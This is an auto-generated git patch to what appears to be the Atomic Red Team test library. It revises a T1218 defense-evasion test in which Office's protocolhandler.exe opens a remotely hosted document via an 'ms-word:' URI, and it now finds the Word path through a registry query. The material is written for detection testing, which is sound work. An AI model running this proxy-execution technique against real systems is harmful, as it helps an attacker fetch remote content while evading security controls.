From c32fa3af4fbbb629ce48d6a76afe7f6f17f6f619 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 8 Apr 2021 17:48:04 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 14 +++++--------- atomics/T1218/T1218.md | 6 +++--- 2 files changed, 8 insertions(+), 12 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index b3d6619f..2170876a 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -40004,10 +40004,6 @@ defense-evasion: supported_platforms: - windows input_arguments: - microsoft_wordpath: - description: path to office folder - type: path - default: C:\Program Files\Microsoft Office\root\Office16 remote_url: description: url to document type: url @@ -40018,8 +40014,8 @@ defense-evasion: must be provided ' - prereq_command: 'if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") - {exit 0} else {exit 1} + prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft + Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct @@ -40029,9 +40025,9 @@ defense-evasion: executor: name: command_prompt elevation_required: false - command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" - -' + command: | + FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b + call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" - name: Microsoft.Workflow.Compiler.exe Payload Execution auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index c1f66294..5e7cdbfd 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -192,7 +192,6 @@ Emulates attack via documents through protocol handler in Microsoft Office. On #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| microsoft_wordpath | path to office folder | path | C:\Program Files\Microsoft Office\root\Office16| | remote_url | url to document | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx| @@ -200,7 +199,8 @@ Emulates attack via documents through protocol handler in Microsoft Office. On ```cmd -"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" +FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b +call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ``` @@ -210,7 +210,7 @@ Emulates attack via documents through protocol handler in Microsoft Office. On ##### Description: Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided ##### Check Prereq Commands: ```powershell -if (Test-Path "#{microsoft_wordpath}\protocolhandler.exe") {exit 0} else {exit 1} +if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell